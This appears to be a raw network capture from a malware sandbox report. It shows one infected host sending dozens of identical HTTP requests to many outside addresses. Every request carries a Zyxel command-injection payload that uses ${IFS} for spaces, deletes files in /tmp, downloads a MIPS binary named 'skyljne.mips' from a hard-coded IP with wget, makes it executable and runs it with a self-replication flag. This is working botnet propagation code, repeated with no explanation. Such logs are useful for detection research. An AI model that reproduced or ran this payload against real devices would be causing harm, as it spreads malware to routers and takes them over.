                                      Jan 14, 2024 15:50:52.441333055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5970192.168.2.145191434.102.10.32443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.441371918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5971192.168.2.1451894168.219.151.151443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.441404104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5972192.168.2.145954254.228.58.10443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.441438913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5973192.168.2.145232876.75.44.133443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.441507101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5974192.168.2.144794824.9.16.85443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.441538095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5975192.168.2.1433674216.243.120.84443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.441577911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5976192.168.2.145594897.208.179.119443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.441634893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5977192.168.2.1451848209.43.91.79443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.441670895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5978192.168.2.14451004.154.38.186443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.441703081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5979192.168.2.143425679.172.16.2443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.441740036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5980192.168.2.1434756211.185.58.57443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.441783905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5981192.168.2.1437066131.52.12.36443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.441843987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5982192.168.2.144559484.174.204.73443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.441865921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5983192.168.2.145368860.90.37.38443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.441899061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5984192.168.2.1444876120.153.11.96443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.441965103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5985192.168.2.145787275.229.220.51443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.442013025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5986192.168.2.145918468.64.104.84443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.442044973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5987192.168.2.1457502108.15.13.138443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.442106962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5988192.168.2.1455918154.22.135.235443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.442133904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5989192.168.2.1438636208.195.110.95443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.442198992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5990192.168.2.1452770223.148.121.29443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.442250967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5991192.168.2.143674088.207.28.153443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.442302942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5992192.168.2.1450672176.154.14.77443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.442356110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5993192.168.2.144255295.104.113.233443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.442368031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5994192.168.2.1433134133.37.48.9443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.442421913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5995192.168.2.1450548112.81.65.189443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.442459106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5996192.168.2.1436292107.221.177.146443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.442481995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5997192.168.2.1433882150.150.206.125443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.442543030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5998192.168.2.1459422165.224.228.85443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.442586899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5999192.168.2.143347232.58.209.10443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.442643881 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6000192.168.2.145489875.56.38.38443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.442675114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6001192.168.2.1449524115.104.149.194443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.442738056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6002192.168.2.143437086.16.142.48443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.442795992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6003192.168.2.1444848101.142.172.222443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.446731091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6004192.168.2.1440368110.10.237.222443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.446764946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6005192.168.2.1454998119.69.0.57443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.446810007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6006192.168.2.143627031.119.120.43443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.446851969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6007192.168.2.1456238223.108.222.26443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.446885109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6008192.168.2.1446286118.245.86.161443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.446933985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6009192.168.2.1439380221.127.101.109443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:52.446968079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6010192.168.2.144740073.172.187.46443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.460469007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6011192.168.2.1433616221.191.26.92443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.460499048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6012192.168.2.1459002147.22.141.70443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.460560083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6013192.168.2.145022866.229.191.133443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.460602045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6014192.168.2.143965494.94.24.63443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.460628986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6015192.168.2.145636618.253.9.145443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.460690975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6016192.168.2.1436480129.254.22.56443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.460736036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6017192.168.2.144258850.202.127.249443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.460762024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6018192.168.2.1439014131.207.247.30443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.460817099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6019192.168.2.14565444.68.23.189443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.460851908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6020192.168.2.1448174119.68.201.241443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.460913897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6021192.168.2.14575342.94.187.25443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.460942984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6022192.168.2.145759651.146.89.22443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.460974932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6023192.168.2.1433700104.105.7.20443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.461029053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6024192.168.2.1454750187.66.123.170443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.461054087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6025192.168.2.1455436163.229.112.98443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.461101055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6026192.168.2.1433574179.13.102.69443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.461143017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6027192.168.2.1440744189.15.95.194443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.461194038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6028192.168.2.1435836204.131.101.226443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.461225986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6029192.168.2.146064642.179.96.69443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.461275101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6030192.168.2.1438824174.6.249.196443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.461318970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6031192.168.2.1439844218.20.13.171443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.461348057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6032192.168.2.1439176102.13.12.38443
                                      TimestampBytes transferredDirectionData
